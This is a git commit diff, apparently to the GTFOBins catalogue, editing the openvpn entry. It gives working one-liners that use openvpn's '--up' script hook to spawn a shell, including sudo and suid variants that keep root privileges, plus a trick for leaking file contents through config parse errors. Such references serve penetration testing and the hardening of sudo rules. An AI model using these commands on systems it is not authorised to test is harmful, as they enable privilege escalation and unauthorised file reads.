Allow unprivileged shell in openvpn by using a null device

Related #171.
This commit is contained in:
Andrea Cardaci 2021-02-20 00:55:31 +01:00
parent 7bf1608cd5
commit c299dc3a52

View File

@ -1,5 +1,8 @@
--- ---
functions: functions:
shell:
- code: |
openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
file-read: file-read:
- description: The file is actually parsed and the first partial wrong line is returned in an error message. - description: The file is actually parsed and the first partial wrong line is returned in an error message.
code: | code: |
@ -7,14 +10,14 @@ functions:
openvpn --config "$LFILE" openvpn --config "$LFILE"
suid: suid:
- code: | - code: |
./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c "sh -p"' ./openvpn --dev null --script-security 2 --up '/bin/sh -p -c "sh -p"'
- description: The file is actually parsed and the first partial wrong line is returned in an error message. - description: The file is actually parsed and the first partial wrong line is returned in an error message.
code: | code: |
LFILE=file_to_read LFILE=file_to_read
./openvpn --config "$LFILE" ./openvpn --config "$LFILE"
sudo: sudo:
- code: | - code: |
sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh' sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
- description: The file is actually parsed and the first partial wrong line is returned in an error message. - description: The file is actually parsed and the first partial wrong line is returned in an error message.
code: | code: |
LFILE=file_to_read LFILE=file_to_read